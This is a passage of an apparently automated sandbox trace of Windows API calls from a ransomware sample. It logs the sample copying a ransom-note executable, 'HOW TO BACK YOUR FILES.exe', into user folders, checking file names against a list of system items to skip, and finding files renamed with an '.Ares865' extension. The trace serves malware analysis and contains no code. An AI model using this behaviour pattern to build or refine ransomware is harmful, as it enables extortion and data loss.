nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0109.166] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0109.166] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b639c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0109.166] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0109.166] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0109.166] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab" [0109.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0109.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0109.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab") returned 72 [0109.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab" [0109.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.166] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\collab\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.167] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.167] GetLastError () returned 0x0 [0109.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.167] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.167] CloseHandle (hObject=0x120) returned 1 [0109.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.167] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.167] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0109.167] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.167] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.167] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0109.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0109.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0109.168] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b639c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0109.168] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0109.168] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b639c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0109.168] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0109.168] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0109.168] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0109.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0109.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0109.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 37 [0109.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0109.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.169] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.169] GetLastError () returned 0x0 [0109.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.169] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.169] CloseHandle (hObject=0x120) returned 1 [0109.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50b89b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b89b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.169] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.169] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0109.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50b89b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b89b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.169] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.169] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0109.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0109.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0109.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b89b20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50b89b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0109.169] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0109.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69dd2120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69dd2120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="aoldtz.exe") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2=".") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="..") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="windows") returned -1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="bootmgr") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="temp") returned -1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="pagefile.sys") returned -1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="boot") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="ids.txt") returned 1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="ntuser.dat") returned -1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="perflogs") returned -1 [0109.170] lstrcmpiW (lpString1="Local", lpString2="MSBuild") returned -1 [0109.170] lstrlenW (lpString="Local") returned 5 [0109.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*") returned 39 [0109.170] lstrcpyW (in: lpString1=0x2cce44c, lpString2="Local" | out: lpString1="Local") returned="Local" [0109.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0109.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df710 [0109.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0109.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50b89b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b89b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="aoldtz.exe") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2=".") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="..") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="windows") returned -1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="bootmgr") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="temp") returned -1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="pagefile.sys") returned -1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="boot") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="ids.txt") returned 1 [0109.170] lstrcmpiW (lpString1="LocalLow", lpString2="ntuser.dat") returned -1 [0109.171] lstrcmpiW (lpString1="LocalLow", lpString2="perflogs") returned -1 [0109.171] lstrcmpiW (lpString1="LocalLow", lpString2="MSBuild") returned -1 [0109.171] lstrlenW (lpString="LocalLow") returned 8 [0109.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0109.171] lstrcpyW (in: lpString1=0x2cce44c, lpString2="LocalLow" | out: lpString1="LocalLow") returned="LocalLow" [0109.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0109.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0109.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0109.171] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x71f1ac00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x71f1ac00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="aoldtz.exe") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2=".") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="..") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="windows") returned -1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="bootmgr") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="temp") returned -1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="pagefile.sys") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="boot") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="ids.txt") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="ntuser.dat") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="perflogs") returned 1 [0109.171] lstrcmpiW (lpString1="Roaming", lpString2="MSBuild") returned 1 [0109.171] lstrlenW (lpString="Roaming") returned 7 [0109.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 46 [0109.171] lstrcpyW (in: lpString1=0x2cce44c, lpString2="Roaming" | out: lpString1="Roaming") returned="Roaming" [0109.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0109.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f2100 [0109.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0109.171] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x71f1ac00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x71f1ac00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0109.171] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0109.171] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0109.171] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0109.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0109.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0109.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0109.172] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.172] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.172] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.173] GetLastError () returned 0x0 [0109.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.173] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.173] CloseHandle (hObject=0x120) returned 1 [0109.173] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.173] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x71f1ac00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x71f1ac00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.173] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.173] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0109.173] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x71f1ac00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x71f1ac00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.173] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.173] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0109.173] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0109.173] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0109.173] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3c6da330, ftCreationTime.dwHighDateTime=0x1d4d3b0, ftLastAccessTime.dwLowDateTime=0xc2ba80e0, ftLastAccessTime.dwHighDateTime=0x1d4ca3f, ftLastWriteTime.dwLowDateTime=0x71cb9600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xdac0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0y2JaFXisom.swf.Ares865", cAlternateFileName="0Y2JAF~1.ARE")) returned 1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="aoldtz.exe") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2=".") returned 1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="..") returned 1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="windows") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="bootmgr") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="temp") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="pagefile.sys") returned -1 [0109.173] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="boot") returned -1 [0109.174] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="ids.txt") returned -1 [0109.174] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="ntuser.dat") returned -1 [0109.174] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="perflogs") returned -1 [0109.174] lstrcmpiW (lpString1="0y2JaFXisom.swf.Ares865", lpString2="MSBuild") returned -1 [0109.174] lstrlenW (lpString="0y2JaFXisom.swf.Ares865") returned 23 [0109.174] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*") returned 47 [0109.174] lstrcpyW (in: lpString1=0x2cce45c, lpString2="0y2JaFXisom.swf.Ares865" | out: lpString1="0y2JaFXisom.swf.Ares865") returned="0y2JaFXisom.swf.Ares865" [0109.174] lstrlenW (lpString="0y2JaFXisom.swf.Ares865") returned 23 [0109.174] lstrlenW (lpString="Ares865") returned 7 [0109.174] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.174] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae216f0, ftCreationTime.dwHighDateTime=0x1d4ca84, ftLastAccessTime.dwLowDateTime=0xef24b510, ftLastAccessTime.dwHighDateTime=0x1d4cdd7, ftLastWriteTime.dwLowDateTime=0x71cdf760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x14890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1ddGr.gif.Ares865", cAlternateFileName="1DDGRG~1.ARE")) returned 1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="aoldtz.exe") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2=".") returned 1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="..") returned 1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", 